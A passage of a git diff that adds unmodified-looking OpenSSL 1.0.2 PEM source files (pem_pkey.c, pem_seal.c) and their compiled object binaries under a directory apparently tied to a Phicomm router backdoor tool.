zoMae`+R+*-2yukZ;I5Yn@V7^^17=#%H&EMW%+*(rlIA!xa*?9Ff`_FUDMstS(e<LE
zWtasQ?7$ro=(b&*k^+bt#kW9-pgN*}>0!HoZOM3RM~80o4yIGXqiI%Dg56VmD^XeK
z8izwt^@a!fq&yWeQIsg^E@E77!KQ?RHdh`rhuaijVNPu?dGw_^-MLPVBh|QcX`SMB
zf&1Y{@aqK$zsE?3-v$@q_}xW9{C2nqpFj`@@z26V`1cV6LL7ff5dIScft>QcuwjmW
z4#p(^YYE3Q5aIYeMnXNy;39k$K_J8fa1l=DcEs^7IKms?`+<bG99Nr!E5IZ9hb4T4
zgyVM+>2A2b2p7rYcM%D;XNG4x!hh@{kKaWkr~C;?eiiUZ&!1f6-xoN>wOW$@w~L-C
zGzjFhs|XzR;GR!*LjuQm@!LT-eqWLBQ4JU2%`WntF7l(2JlY^VPrAtO6Sy<pvl6~m
z(sLVpw~(B5Z<cVm|A!@9?vtGoF8Am25{|!n$^Vxme4T_JmT+0m>k^J<YtnO4!tapq
zcO+b1j~68TE0X+G3CFWO>F0@ocg&CMPYnV<_>kAvSqYcdSB*FqAY0B`Lc-;Bv_Sl%
zz?#c-_X`}$DfiWKfunx8Kc}SrUkN;l>tzWKO88f$K9S|ONVqJIV<cn?5&lm5C*gGd
zpW@u2Je}uXaNu-4$KN4Hq=(MoZ`p7Gr*rjH2Ttc_pNN<A&^furfzvtp>kgcLhyKuk
z(|Pq32TteJzc_F@uikLrbY2aJB$A)>J2&aT=^UGJ;B=0C&Vkc8_K*XobL@-*r*kZe
zjE)bPsUCQmS^K$-M%naWDq^O0nJm(mGE*$lGdjv5*%5p}@mM6rBE2I+L+N1<86Gjy
z5%`O39X~aS_wNjkMKaluOgd|h!&Fq5-Udg+)KFR!^8b7UVLql>ERTY=dNEq%V2H95
z<Zw;mnyN1#_TUgMVxW4le({@zbLpQ3+!K)QgbQ)8y&%M?$6=Rnr+wTrQRn|UKL&GA
zXDwVZk^NON2xGEO&w7DH9ddhx|M)GDiRRHW0Zbapaxc#_{w**G|J4!gSx|9E%nue2
zdqDXo_`5Jb`_B0@V*ady;haARbIaBL5+1gIPK)5M{)^zE`BeXMwsGDoC=5jF8255K
oUpeQan6vf(G5-?0Gj`Cybmkhr-3}2xZ)Q1vFgnlLZ*yz)AARFGp8x;=

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_pkey.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_pkey.c
new file mode 100644
index 0000000..04d6319
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_pkey.c
@@ -0,0 +1,293 @@
+/* crypto/pem/pem_pkey.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/rand.h>
+#include <openssl/x509.h>
+#include <openssl/pkcs12.h>
+#include <openssl/pem.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+#include "asn1_locl.h"
+
+int pem_check_suffix(const char *pem_str, const char *suffix);
+
+EVP_PKEY *PEM_read_bio_PrivateKey(BIO *bp, EVP_PKEY **x, pem_password_cb *cb,
+                                  void *u)
+{
+    char *nm = NULL;
+    const unsigned char *p = NULL;
+    unsigned char *data = NULL;
+    long len;
+    int slen;
+    EVP_PKEY *ret = NULL;
+
+    if (!PEM_bytes_read_bio(&data, &len, &nm, PEM_STRING_EVP_PKEY, bp, cb, u))
+        return NULL;
+    p = data;
+
+    if (strcmp(nm, PEM_STRING_PKCS8INF) == 0) {
+        PKCS8_PRIV_KEY_INFO *p8inf;
+        p8inf = d2i_PKCS8_PRIV_KEY_INFO(NULL, &p, len);
+        if (!p8inf)
+            goto p8err;
+        ret = EVP_PKCS82PKEY(p8inf);
+        if (x) {
+            if (*x)
+                EVP_PKEY_free((EVP_PKEY *)*x);
+            *x = ret;
+        }
+        PKCS8_PRIV_KEY_INFO_free(p8inf);
+    } else if (strcmp(nm, PEM_STRING_PKCS8) == 0) {
+        PKCS8_PRIV_KEY_INFO *p8inf;
+        X509_SIG *p8;
+        int klen;
+        char psbuf[PEM_BUFSIZE];
+        p8 = d2i_X509_SIG(NULL, &p, len);
+        if (!p8)
+            goto p8err;
+        if (cb)
+            klen = cb(psbuf, PEM_BUFSIZE, 0, u);
+        else
+            klen = PEM_def_callback(psbuf, PEM_BUFSIZE, 0, u);
+        if (klen <= 0) {
+            PEMerr(PEM_F_PEM_READ_BIO_PRIVATEKEY, PEM_R_BAD_PASSWORD_READ);
+            X509_SIG_free(p8);
+            goto err;
+        }
+        p8inf = PKCS8_decrypt(p8, psbuf, klen);
+        X509_SIG_free(p8);
+        if (!p8inf)
+            goto p8err;
+        ret = EVP_PKCS82PKEY(p8inf);
+        if (x) {
+            if (*x)
+                EVP_PKEY_free((EVP_PKEY *)*x);
+            *x = ret;
+        }
+        PKCS8_PRIV_KEY_INFO_free(p8inf);
+    } else if ((slen = pem_check_suffix(nm, "PRIVATE KEY")) > 0) {
+        const EVP_PKEY_ASN1_METHOD *ameth;
+        ameth = EVP_PKEY_asn1_find_str(NULL, nm, slen);
+        if (!ameth || !ameth->old_priv_decode)
+            goto p8err;
+        ret = d2i_PrivateKey(ameth->pkey_id, x, &p, len);
+    }
+ p8err:
+    if (ret == NULL)
+        PEMerr(PEM_F_PEM_READ_BIO_PRIVATEKEY, ERR_R_ASN1_LIB);
+ err:
+    OPENSSL_free(nm);
+    OPENSSL_cleanse(data, len);
+    OPENSSL_free(data);
+    return (ret);
+}
+
+int PEM_write_bio_PrivateKey(BIO *bp, EVP_PKEY *x, const EVP_CIPHER *enc,
+                             unsigned char *kstr, int klen,
+                             pem_password_cb *cb, void *u)
+{
+    char pem_str[80];
+    if (!x->ameth || x->ameth->priv_encode)
+        return PEM_write_bio_PKCS8PrivateKey(bp, x, enc,
+                                             (char *)kstr, klen, cb, u);
+
+    BIO_snprintf(pem_str, 80, "%s PRIVATE KEY", x->ameth->pem_str);
+    return PEM_ASN1_write_bio((i2d_of_void *)i2d_PrivateKey,
+                              pem_str, bp, x, enc, kstr, klen, cb, u);
+}
+
+EVP_PKEY *PEM_read_bio_Parameters(BIO *bp, EVP_PKEY **x)
+{
+    char *nm = NULL;
+    const unsigned char *p = NULL;
+    unsigned char *data = NULL;
+    long len;
+    int slen;
+    EVP_PKEY *ret = NULL;
+
+    if (!PEM_bytes_read_bio(&data, &len, &nm, PEM_STRING_PARAMETERS,
+                            bp, 0, NULL))
+        return NULL;
+    p = data;
+
+    if ((slen = pem_check_suffix(nm, "PARAMETERS")) > 0) {
+        ret = EVP_PKEY_new();
+        if (!ret)
+            goto err;
+        if (!EVP_PKEY_set_type_str(ret, nm, slen)
+            || !ret->ameth->param_decode
+            || !ret->ameth->param_decode(ret, &p, len)) {
+            EVP_PKEY_free(ret);
+            ret = NULL;
+            goto err;
+        }
+        if (x) {
+            if (*x)
+                EVP_PKEY_free((EVP_PKEY *)*x);
+            *x = ret;
+        }
+    }
+ err:
+    if (ret == NULL)
+        PEMerr(PEM_F_PEM_READ_BIO_PARAMETERS, ERR_R_ASN1_LIB);
+    OPENSSL_free(nm);
+    OPENSSL_free(data);
+    return (ret);
+}
+
+int PEM_write_bio_Parameters(BIO *bp, EVP_PKEY *x)
+{
+    char pem_str[80];
+    if (!x->ameth || !x->ameth->param_encode)
+        return 0;
+
+    BIO_snprintf(pem_str, 80, "%s PARAMETERS", x->ameth->pem_str);
+    return PEM_ASN1_write_bio((i2d_of_void *)x->ameth->param_encode,
+                              pem_str, bp, x, NULL, NULL, 0, 0, NULL);
+}
+
+#ifndef OPENSSL_NO_FP_API
+EVP_PKEY *PEM_read_PrivateKey(FILE *fp, EVP_PKEY **x, pem_password_cb *cb,
+                              void *u)
+{
+    BIO *b;
+    EVP_PKEY *ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        PEMerr(PEM_F_PEM_READ_PRIVATEKEY, ERR_R_BUF_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    ret = PEM_read_bio_PrivateKey(b, x, cb, u);
+    BIO_free(b);
+    return (ret);
+}
+
+int PEM_write_PrivateKey(FILE *fp, EVP_PKEY *x, const EVP_CIPHER *enc,
+                         unsigned char *kstr, int klen,
+                         pem_password_cb *cb, void *u)
+{
+    BIO *b;
+    int ret;
+
+    if ((b = BIO_new_fp(fp, BIO_NOCLOSE)) == NULL) {
+        PEMerr(PEM_F_PEM_WRITE_PRIVATEKEY, ERR_R_BUF_LIB);
+        return 0;
+    }
+    ret = PEM_write_bio_PrivateKey(b, x, enc, kstr, klen, cb, u);
+    BIO_free(b);
+    return ret;
+}
+
+#endif
+
+#ifndef OPENSSL_NO_DH
+
+/* Transparently read in PKCS#3 or X9.42 DH parameters */
+
+DH *PEM_read_bio_DHparams(BIO *bp, DH **x, pem_password_cb *cb, void *u)
+{
+    char *nm = NULL;
+    const unsigned char *p = NULL;
+    unsigned char *data = NULL;
+    long len;
+    DH *ret = NULL;
+
+    if (!PEM_bytes_read_bio(&data, &len, &nm, PEM_STRING_DHPARAMS, bp, cb, u))
+        return NULL;
+    p = data;
+
+    if (!strcmp(nm, PEM_STRING_DHXPARAMS))
+        ret = d2i_DHxparams(x, &p, len);
+    else
+        ret = d2i_DHparams(x, &p, len);
+
+    if (ret == NULL)
+        PEMerr(PEM_F_PEM_READ_BIO_DHPARAMS, ERR_R_ASN1_LIB);
+    OPENSSL_free(nm);
+    OPENSSL_free(data);
+    return ret;
+}
+
+# ifndef OPENSSL_NO_FP_API
+DH *PEM_read_DHparams(FILE *fp, DH **x, pem_password_cb *cb, void *u)
+{
+    BIO *b;
+    DH *ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        PEMerr(PEM_F_PEM_READ_DHPARAMS, ERR_R_BUF_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    ret = PEM_read_bio_DHparams(b, x, cb, u);
+    BIO_free(b);
+    return (ret);
+}
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_pkey.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_pkey.o
new file mode 100644
index 0000000000000000000000000000000000000000..7b6257520c9914a1155df6095bf62276aba0a41e
GIT binary patch
literal 7832
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_seal.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_seal.c
new file mode 100644
index 0000000..a5c1812
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_seal.c
@@ -0,0 +1,191 @@
+/* crypto/pem/pem_seal.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/opensslconf.h> /* for OPENSSL_NO_RSA */
+#ifndef OPENSSL_NO_RSA
+# include <stdio.h>
+# include "cryptlib.h"
+# include <openssl/evp.h>
+# include <openssl/rand.h>
+# include <openssl/objects.h>
+# include <openssl/x509.h>
+# include <openssl/pem.h>
+# include <openssl/rsa.h>
+
+int PEM_SealInit(PEM_ENCODE_SEAL_CTX *ctx, EVP_CIPHER *type, EVP_MD *md_type,
+                 unsigned char **ek, int *ekl, unsigned char *iv,
+                 EVP_PKEY **pubk, int npubk)
+{
+    unsigned char key[EVP_MAX_KEY_LENGTH];
+    int ret = -1;
+    int i, j, max = 0;
+    char *s = NULL;
+
+    for (i = 0; i < npubk; i++) {
+        if (pubk[i]->type != EVP_PKEY_RSA) {
+            PEMerr(PEM_F_PEM_SEALINIT, PEM_R_PUBLIC_KEY_NO_RSA);
+            goto err;
+        }
+        j = RSA_size(pubk[i]->pkey.rsa);
+        if (j > max)
+            max = j;
+    }
+    s = (char *)OPENSSL_malloc(max * 2);
+    if (s == NULL) {
+        PEMerr(PEM_F_PEM_SEALINIT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    EVP_EncodeInit(&ctx->encode);
+
+    EVP_MD_CTX_init(&ctx->md);
+    if (!EVP_SignInit(&ctx->md, md_type))
+        goto err;
+
+    EVP_CIPHER_CTX_init(&ctx->cipher);
+    ret = EVP_SealInit(&ctx->cipher, type, ek, ekl, iv, pubk, npubk);
+    if (ret <= 0)
+        goto err;
+
+    /* base64 encode the keys */
+    for (i = 0; i < npubk; i++) {
+        j = EVP_EncodeBlock((unsigned char *)s, ek[i],
+                            RSA_size(pubk[i]->pkey.rsa));
+        ekl[i] = j;
+        memcpy(ek[i], s, j + 1);
+    }
+
+    ret = npubk;
+ err:
+    if (s != NULL)
+        OPENSSL_free(s);
+    OPENSSL_cleanse(key, EVP_MAX_KEY_LENGTH);
+    return (ret);
+}
+
+void PEM_SealUpdate(PEM_ENCODE_SEAL_CTX *ctx, unsigned char *out, int *outl,
+                    unsigned char *in, int inl)
+{
+    unsigned char buffer[1600];
+    int i, j;
+
+    *outl = 0;
+    EVP_SignUpdate(&ctx->md, in, inl);
+    for (;;) {
+        if (inl <= 0)
+            break;
+        if (inl > 1200)
+            i = 1200;
+        else
+            i = inl;
+        EVP_EncryptUpdate(&ctx->cipher, buffer, &j, in, i);
+        EVP_EncodeUpdate(&ctx->encode, out, &j, buffer, j);
+        *outl += j;
+        out += j;
+        in += i;
+        inl -= i;
+    }
+}
+
+int PEM_SealFinal(PEM_ENCODE_SEAL_CTX *ctx, unsigned char *sig, int *sigl,
+                  unsigned char *out, int *outl, EVP_PKEY *priv)
+{
+    unsigned char *s = NULL;
+    int ret = 0, j;
+    unsigned int i;
+
+    if (priv->type != EVP_PKEY_RSA) {
+        PEMerr(PEM_F_PEM_SEALFINAL, PEM_R_PUBLIC_KEY_NO_RSA);
+        goto err;
+    }
+    i = RSA_size(priv->pkey.rsa);
+    if (i < 100)
+        i = 100;
+    s = (unsigned char *)OPENSSL_malloc(i * 2);
+    if (s == NULL) {
+        PEMerr(PEM_F_PEM_SEALFINAL, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (!EVP_EncryptFinal_ex(&ctx->cipher, s, (int *)&i))
+        goto err;
+    EVP_EncodeUpdate(&ctx->encode, out, &j, s, i);
+    *outl = j;
+    out += j;
+    EVP_EncodeFinal(&ctx->encode, out, &j);
+    *outl += j;
+
+    if (!EVP_SignFinal(&ctx->md, s, &i, priv))
+        goto err;
+    *sigl = EVP_EncodeBlock(sig, s, i);
+
+    ret = 1;
+ err:
+    EVP_MD_CTX_cleanup(&ctx->md);
+    EVP_CIPHER_CTX_cleanup(&ctx->cipher);
+    if (s != NULL)
+        OPENSSL_free(s);
+    return (ret);
+}
+#else                           /* !OPENSSL_NO_RSA */
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_seal.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_seal.o
new file mode 100644
index 0000000000000000000000000000000000000000..926b6766ea6246817fb640025064bba45f21e1d2
GIT binary patch
literal 4608
zcmbuBeQXp(6u{?trBsD&#i~UO9=MwN!P$c<tr630@7g)oLeusT@MAr$3$3(w^==yr
zG$1*unVhF!G%<ce|B!^g2!CkORMTFd6-e+~(F8xDi62cxMTj(DsPE10wA14*G5V6(
z+4tM`-n^N4JG;9AdP9NBMTEG>17t=Ml#r*CnfqFPTT2u&pPVgObU}MC$iDP_s;$#P
zO>9hS3$ha--|1G$F4E+$eUw>hv7UNcJp^t#)78>;nku}t0yN6}YKJdV^P)Nk+RkOc
zRN+ZFbvRjFWX%isGQQ(OQQ#9AP4#&wYg5aA0hQ1c+|`Vg=)X*irTdqXq4fyU_uw<z
zfQ`|COz#pqga&vx2A7d5;G!izn&L*|L!eRio$Zm{@fc<O(*wYr&Mr;c4rEI9B*9!y
zzq=PY-zlBhL3B2*vmZcfPVG@M@TiHMY1UJI)k9O36K&%LjU64x><rYrW>2#Urui*S
zi4Pr2Reep_@9eOn-4EJtY3kCL|8+vAj?l>Qvu{lt@u%M7-eBrv+^<#)*TRst3S)M(
z)8+QMT61ie9PRV7$%h`%9@ZYw9@UH^_HJqGg6tAa?|MuN1=$zD$j7*4=P3IyMA-+h
zZJ*KIzjhQ6BJI;2bv*!IMmrjSA)P@7PVL;f`{JQOSk)1{>S@>*%EtXAYc5i_FVopc
